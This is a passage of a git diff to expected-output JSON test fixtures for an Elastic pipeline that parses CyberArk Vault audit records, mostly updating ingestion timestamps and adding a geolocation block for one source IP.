Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -250,7 +250,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416596700Z", + "ingested": "2021-12-14T14:42:31.833285387Z", "original": "\u003c5\u003e1 2021-03-14T12:04:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:35\",\"IsoTimestamp\":\"2021-03-14T12:04:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -314,7 +314,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416602300Z", + "ingested": "2021-12-14T14:42:31.833285843Z", "original": "\u003c5\u003e1 2021-03-14T12:04:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:53\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:53Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:53\",\"IsoTimestamp\":\"2021-03-14T12:04:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json index 950d83a79c9..5719943ef0b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -49,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:03.891416600Z", + "ingested": "2021-12-14T14:42:32.347121200Z", "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", "code": "4", "kind": "event", @@ -125,7 +134,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:03.891424700Z", + "ingested": "2021-12-14T14:42:32.347123882Z", "original": "\u003c7\u003e1 2021-03-11T18:03:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:03:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:03:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e4\u003c/MessageID\u003e\\n \u003cDesc\u003eUser Authentication\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUser Authentication\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUser Authentication\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:03:43\",\"IsoTimestamp\":\"2021-03-11T18:03:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "4", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json index 2bf4a12105e..58d699ff81f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json @@ -95,7 +95,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.116666Z", + "ingested": "2021-12-14T14:42:32.628459893Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e411\u003c/MessageID\u003e\\n \u003cDesc\u003eWindow Title\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eWindow Title\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.5\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eWindow Title\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"411\",\"Desc\":\"Window Title\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Window Title\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.5\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\",\"IsoTimestamp\":\"2021-03-16T17:11:42Z\",\"Message\":\"Window Title\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "411", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json index 51effe33ff9..417eea8c57e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json @@ -101,7 +101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.279820500Z", + "ingested": "2021-12-14T14:42:32.813156345Z", "original": "\u003c5\u003e1 2021-03-25T11:29:37Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 07:29:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T11:29:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e412\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eMSSQL\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MSSql-epmsvr01.cybr.com-sa\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MSSql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"sa\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"tgtsvr01.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"master\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580240\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011980\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SQL;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 07:29:37\",\"IsoTimestamp\":\"2021-03-25T11:29:37Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"412\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"MSSQL\",\"File\":\"Root\\\\Database-MSSql-epmsvr01.cybr.com-sa\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MSSql\"},{\"Name\":\"UserName\",\"Value\":\"sa\"},{\"Name\":\"Address\",\"Value\":\"tgtsvr01.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"master\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580240\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011980\"},{\"Name\":\"Tags\",\"Value\":\"SQL;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "412", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json index 6c06eebed5b..da01d78848f 100644 --- 